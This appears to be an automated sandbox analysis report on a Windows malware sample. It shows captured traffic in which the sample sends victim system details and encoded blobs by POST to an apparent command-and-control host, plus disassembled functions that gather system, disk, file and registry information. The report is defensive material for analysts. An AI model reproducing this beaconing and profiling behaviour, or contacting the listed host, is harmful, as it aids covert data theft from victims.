Dec 31, 2024 09:45:26.801568031 CET	12360	OUT	POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: / Content-Type: application/json Content-Length: 442494 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 33 37 36 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627433764", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 09:45:26.806607008 CET	9888	OUT	Data Raw: 75 78 57 64 33 46 4a 61 33 6b 75 67 61 48 71 73 64 70 63 6f 38 4e 79 30 55 69 73 6f 39 53 30 72 34 4d 65 41 4e 49 43 76 72 57 72 61 37 34 79 76 56 55 46 72 66 54 6f 34 76 43 33 68 2b 4b 34 52 75 52 39 70 75 46 31 58 58 64 63 30 36 59 44 74 62 65 Data Ascii: uxWd3FJa3kugaHqsdpco8Ny0Uiso9S0r4MeANICvrWra74yvVUFrfTo4vC3h+K4RuR9puF1XXdc06YDtbeDb9VPBjbp+ecQeJvBeQTrUMbnFPFY6hUnSq5flkXj8XTr0m41MPX9hfDYOvCz56eOxGGktE\/elFP9N4Z8H\/EDiunh8VgMhrYPLsTTp16OaZxKOV4Krhq0YypYrDLE2xePw1WMounWy7C4yE03KLcYzlH5LH\/AC
Dec 31, 2024 09:45:26.806682110 CET	4944	OUT	Data Raw: 41 4f 72 32 34 70 67 44 74 39 31 50 4d 50 31 49 5c 2f 57 70 39 72 5c 2f 37 6e 50 2b 72 5c 2f 41 4f 57 5c 2f 54 32 7a 31 71 44 79 33 2b 54 2b 50 48 2b 52 2b 6e 30 5c 2f 58 4e 42 30 42 35 61 66 78 70 47 6e 5c 2f 41 43 31 37 69 66 70 56 4e 6c 2b 62 Data Ascii: AOr24pgDt91PMP1I\/Wp9r\/7nP+r\/AOW\/T2z1qDy3+T+PH+R+n0\/XNB0B5afxpGn\/AC17ifpVNl+b\/Y\/6afuLf\/t07df\/AK9XNv7v5\/zk\/n+f8sdRUO2P5\/4\/L\/e9zQdlPr8isWO3Z9f8\/hx\/k0yVv3e9\/wDv5\/npzj\/Cpv8AWfx\/9s\/\/AK38v5Uxhukd9keP8\/hzz\/8AroNCtt3R8ny+0UXm\/
Dec 31, 2024 09:45:26.806730032 CET	4944	OUT	Data Raw: 37 58 38 37 64 66 30 4f 66 38 41 42 44 6c 38 65 46 66 32 6a 78 6e 47 50 45 48 77 76 50 58 48 58 54 76 48 51 5c 2f 38 41 5a 61 5c 2f 6c 58 36 5a 4d 75 62 77 55 78 79 74 5c 2f 7a 55 66 44 5c 2f 77 43 47 49 71 76 74 35 48 39 70 5c 2f 51 46 62 58 30 Data Ascii: 7X87df0Of8ABDl8eFf2jxnGPEHwvPXHXTvHQ\/8AZa\/lX6ZMubwUxyt\/zUfD\/wCGIqvt5H9p\/QFbX0hcut\/0SvE+yu\/92odD+Wn4n\/GDx98X7jwZP461qTU4vh78OPA3wp8G2CK0On6B4L+H3h6x8OaHp1hab3SGSeGybVNWnUhtQ1q\/1C\/cJ9oWKPqf2ffjjqnwP8Yanevay6\/4A8eeGdZ+HXxc8DGZIbbxv8OPF
Dec 31, 2024 09:45:26.806771040 CET	4944	OUT	Data Raw: 4e 5c 2f 45 4f 39 2b 44 58 78 62 38 4f 66 42 44 34 30 36 54 38 4e 39 61 2b 4a 4c 36 78 38 4a 5c 2f 69 46 34 76 30 37 78 58 71 58 68 62 54 66 46 4e 74 38 53 5c 2f 68 4e 38 4d 62 4c 56 4e 50 31 78 50 41 33 69 75 30 74 4e 64 38 43 36 6c 34 78 30 53 Data Ascii: N\/EO9+DXxb8OfBD406T8N9a+JL6x8J\/iF4v07xXqXhbTfFNt8S\/hN8MbLVNP1xPA3iu0tNd8C6l4x0SLUdGmsr2\/tXutOa9+Iz\/jjhPhbMMpyviDPMHlWPz2Uo5Vh8V7VPF8uMy\/LnJVIUp0qMP7QzXLMCqmIqUqcsXj8Hh4ydXEUoS\/zE4Z8N+O+MsqzvO+F+G8dnOV8OU5Vc5xeE9i44KMMFi8xmnTqVqdavUhl+X4
Dec 31, 2024 09:45:26.811598063 CET	7416	OUT	Data Raw: 45 65 34 31 33 55 66 43 4f 6e 2b 4f 4c 4b 31 74 76 48 64 72 63 5c 2f 44 59 2b 43 62 33 34 64 77 66 46 61 37 2b 4a 63 53 66 44 37 54 66 41 46 37 34 75 76 64 4e 30 69 2b 35 37 78 42 4c 6f 39 68 48 34 64 31 54 77 7a 38 52 50 68 58 38 53 50 42 76 69 Data Ascii: Ee413UfCOn+OLK1tvHdrc\/DY+Cb34dwfFa7+JcSfD7TfAF74uvdN0i+57xBLo9hH4d1Twz8RPhX8SPBvinwb8e\/Fuj\/ETwVrXj628Ipd\/s2\/C3XvjJ8UvBOuWHj34YeBviN4X8aWHgHQ49a0Ww8R\/D3TNJ8R2ut6Pf6Lrd5pA1fU9I+k4Uyj6Lfhtmn+tfDOKynI8xwuU5jVrZlUz3izHU8Bl6hio5jRzCjmmY43CZfi4
Dec 31, 2024 09:45:26.811686039 CET	7416	OUT	Data Raw: 48 78 66 44 47 63 63 4a 35 58 78 6a 69 38 4c 6b 5c 2f 45 2b 59 59 6a 4d 4f 4a 4d 4a 69 63 44 68 61 30 63 77 71 34 76 4d 63 7a 7a 43 72 4b 6e 58 68 68 31 6a 63 4e 4b 68 55 7a 4e 31 4d 48 48 44 59 6e 44 30 6c 69 4d 42 6c 30 38 62 54 78 32 47 68 6a Data Ascii: HxfDGccJ5Xxji8Lk\/E+YYjMOJMJicDha0cwq4vMczzCrKnXhh1jcNKhUzN1MHHDYnD0liMBl08bTx2GhjcJjv7H4e+ntjcDxPlPFmd+H2Bx+ccMcOVeG+F8Zhcyx9CpluDq8NZbw1JVcPLFLL8XKthsuc69TF4PFTh\/aGYvA\/Uq1XDV8J8jfA7x14S\/ZZ139m34b+E\/GHhT4meFPhof2+vjB8SPjDofwo8c+IvgjdfFv47
Dec 31, 2024 09:45:26.855261087 CET	34608	OUT	Data Raw: 4d 70 35 76 6c 43 54 7a 66 33 2b 65 33 62 30 78 6e 76 52 48 5c 2f 46 6c 35 4e 5c 2f 2b 74 4d 66 35 66 34 34 48 41 39 4b 66 38 6e 2b 75 32 52 75 6e 6d 6d 58 7a 50 2b 57 45 33 2b 54 6e 2b 58 4f 61 59 2b 5c 2f 63 2b 39 49 33 38 76 38 41 64 53 79 52 Data Ascii: Mp5vlCTzf3+e3b0xnvRH\/Fl5N\/+tMf5f44HA9Kf8n+u2RunmmXzP+WE3+Tn+XOaY+\/c+9I38v8AdSyR\/wCf8O2ao0Bvl\/fIkkyeV+6\/qKZtjb7\/AMn\/AF0\/z744p5Ux\/Kjx7JP9Fi8uTyP89+cdaZ5nR0f2l\/57w\/8A1+\/9elBpT6\/L9SL\/AJaQu5jdLj91EPK\/1Pp3+mM\/oTSbPmT+NP8Ap4\/9Jf8A62
Dec 31, 2024 09:45:26.903016090 CET	1236	OUT	Data Raw: 58 6e 6e 75 52 77 66 62 6a 39 4b 5a 38 2b 37 79 5a 6e 6a 32 66 36 71 57 33 50 37 6a 39 50 38 41 39 56 54 65 59 64 79 52 77 5c 2f 4f 35 6c 5c 2f 34 39 5c 2f 77 44 36 33 2b 66 78 71 46 76 37 2b 79 52 34 66 39 56 35 6c 78 4c 6e 5c 2f 50 34 48 38 36 Data Ascii: XnnuRwfbj9KZ8+7yZnj2f6qW3P7j9P8A9VTeYdyRw\/O5l\/49\/wD63+fxqFv7+yR4f9V5lxLn\/P4H86z9n5\/h\/wAEBgbyw6Ifn\/5ayR\/v\/wDPNEbeSyOk2x+ZYo\/N\/D1z+fT2xU3lpJl98mz\/AFv7yX\/R+v8AIflz+FQ+X\/wAf9delwf+XXH+frR7Pz\/D\/gmntPL8f+AM6732f6z\/AFUn\/Lfv+WP8mmeZ5
Dec 31, 2024 09:45:26.955034018 CET	1236	OUT	Data Raw: 32 58 55 75 4b 4d 46 48 47 30 46 44 47 35 52 67 63 6e 6a 56 79 76 43 30 6b 73 58 53 65 63 34 4a 59 33 32 36 70 55 4b 75 56 54 2b 71 62 6f 36 74 65 5c 2f 74 57 5c 2f 74 56 58 50 68 72 39 6e 37 78 46 2b 31 55 66 45 6e 5c 2f 42 56 7a 34 79 5c 2f 43 Data Ascii: 2XUuKMFHG0FDG5RgcnjVyvC0ksXSec4JY326pUKuVT+qbo6te\/tW\/tVXPhr9n7xF+1UfEn\/BVz4y\/CL9o7VLHxp8QtJ0\/9in9nPRbD4dan4X+K+tah8MfFng7QfAumeKofF\/xZ1xPjP8AHC18W\/BmCL4N3Glp4fEul+Jl1Dw34ZeIdX1n9n\/9kH4hXv7P\/jP4ofs\/Wv7MX\/BRnWfHv7clzr3xW0fSP2f9M+Ff7Rn
Dec 31, 2024 09:45:27.004468918 CET	1236	OUT	Data Raw: 76 5c 2f 77 42 57 66 30 5c 2f 57 75 5a 38 56 65 44 74 42 38 62 36 4e 50 6f 58 69 53 79 53 2b 30 32 34 49 5a 34 57 43 45 37 67 43 41 79 73 36 53 42 53 41 78 35 41 7a 6e 48 70 58 31 66 69 4c 77 74 50 6a 6a 67 54 69 37 67 36 6e 69 35 34 43 58 45 2b Data Ascii: v\/wBWf0\/WuZ8VeDtB8b6NPoXiSyS+024IZ4WCE7gCAys6SBSAx5AznHpX1fiLwtPjjgTi7g6ni54CXE+QZnkf1ynJxqYeGZYaphalWnNJuFSNOpLknyyUJWk4TScX8H4Uca0\/DnxI4M46rYGGZUuFs+wWbzwNRJwxMcLNtwabSe\/MleLbirSi7SXiPwPf47fs6L+xL8Nvido\/xS+DH7Rf9r\/8Fhf2gdC8C+MdD13wJ8Uf
Dec 31, 2024 09:45:30.049329042 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 31 Dec 2024 08:45:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49708	91.149.241.220	80	8060	C:\Users\user\Desktop\Hqle5OSmLQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:45:30.855302095 CET	99	OUT	GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 Host: home.fortth14vs.top Accept: /
Dec 31, 2024 09:45:31.633109093 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Tue, 31 Dec 2024 08:45:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49709	91.149.241.220	80	8060	C:\Users\user\Desktop\Hqle5OSmLQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:45:32.515388966 CET	172	OUT	POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 09:45:33.408844948 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Tue, 31 Dec 2024 08:45:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49705	34.197.122.172	443	8060	C:\Users\user\Desktop\Hqle5OSmLQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:45:23 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-31 08:45:24 UTC	224	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:45:24 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-31 08:45:24 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	03:45:20
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Hqle5OSmLQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hqle5OSmLQ.exe"
Imagebase:	0xae0000
File size:	4'512'256 bytes
MD5 hash:	4F6DAB981F84C2DDB35307B748427E30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.9%
Total number of Nodes:	302
Total number of Limit Nodes:	46

Executed Functions

Function 00B1F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s assess started=%d, result=%d, xrefs: 00B20150, 00B201AE
Connected to %s (%s) port %u, xrefs: 00B20026
created %s (timeout %lldms), xrefs: 00B1F4BE, 00B1F5DF
%s starting (timeout=%lldms), xrefs: 00B1FCDD, 00B1FEB1
connect.c, xrefs: 00B1F3BB, 00B1F4FA
ipv4, xrefs: 00B1F331, 00B1F34B, 00B1F36C, 00B1F3EC, 00B1F5BB
%s done, xrefs: 00B1F9CD, 00B1FD27, 00B1FF03
%s connect -> %d, connected=%d, xrefs: 00B1F720
Connection time-out, xrefs: 00B1F2A3
%s trying next, xrefs: 00B1F8FE
%s connect timeout after %lldms, move on!, xrefs: 00B1FA33
all eyeballers failed, xrefs: 00B200FF
ipv6, xrefs: 00B1F3DC
Connection timeout after %lld ms, xrefs: 00B200AC
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00B20254

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: 44a2ff5f5f9e0ac1a0d9f92abc1fa7ea58d670a4c2d857012bb4f707b7da3ab7
Instruction ID: 1e13fd53041703622fbce565e05453aec7deb40eb23e771717ca027de69b613f
Opcode Fuzzy Hash: 44a2ff5f5f9e0ac1a0d9f92abc1fa7ea58d670a4c2d857012bb4f707b7da3ab7
Instruction Fuzzy Hash: F2C2A031A043459FD724DF29C484BAAB7E1FF88314F4586ADEC989B262D770ED84CB81

Function 00AE255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00AE2579
GlobalMemoryStatusEx.KERNELBASE ref: 00AE25CC
GetDriveTypeA.KERNELBASE ref: 00AE2647
GetDiskFreeSpaceExA.KERNELBASE ref: 00AE267E
KiUserCallbackDispatcher.NTDLL ref: 00AE27E2
FindFirstFileW.KERNELBASE ref: 00AE28F8
FindNextFileW.KERNELBASE ref: 00AE291F

Strings

@, xrefs: 00AE25B4
`, xrefs: 00AE29BC

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: @$`
API String ID: 3271271169-3318628307
Opcode ID: d94250d5621d48eaf1390dc77b07ff6901f17f2fd5f83a653728c996bbd20c7b
Instruction ID: d01c9b6acb98b153c7a725d5de435355feea2d2bad611a14b0ff915a53475d23
Opcode Fuzzy Hash: d94250d5621d48eaf1390dc77b07ff6901f17f2fd5f83a653728c996bbd20c7b
Instruction Fuzzy Hash: B4D1B2B59043089FCB50EFA9C99569EBBF0FF48344F40896DE89897301E734AA84DF52

Function 00AE29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00AE2A27
RegOpenKeyExA.KERNELBASE ref: 00AE2A8A
CharUpperA.USER32 ref: 00AE2AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00AE2C26
CloseHandle.KERNELBASE ref: 00AE2C49
CloseHandle.KERNELBASE ref: 00AE2DFC

Strings

0, xrefs: 00AE2DA9

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: 6c70a91a51df3834417b2fae55279bef85b7f54fd1e34c0affc02df61ef1fc41
Instruction ID: ae2a9c54fe6fbb6d95b4a59491bdc939896d826647d105bf4d51c95aa27ef13e
Opcode Fuzzy Hash: 6c70a91a51df3834417b2fae55279bef85b7f54fd1e34c0affc02df61ef1fc41
Instruction Fuzzy Hash: 94E1E4B09043099FCB50EF69DA8569EBBF4AF48744F40886DE888D7340EB75DA84CF42

Function 00AF05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00AF0712
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00AF09DD
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00AF09FC

Strings

multi.c, xrefs: 00AF07B2

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: multi.c
API String ID: 2170980988-214371023
Opcode ID: 8df18294028bc0bb7a0d7dbe7e88131ea11da976008c1dd073e8a8c11da35f6e
Instruction ID: 70e389f93a7474afbd14cf4e8f26a5f1b700223150f57ef0dae1c2036c88173e
Opcode Fuzzy Hash: 8df18294028bc0bb7a0d7dbe7e88131ea11da976008c1dd073e8a8c11da35f6e
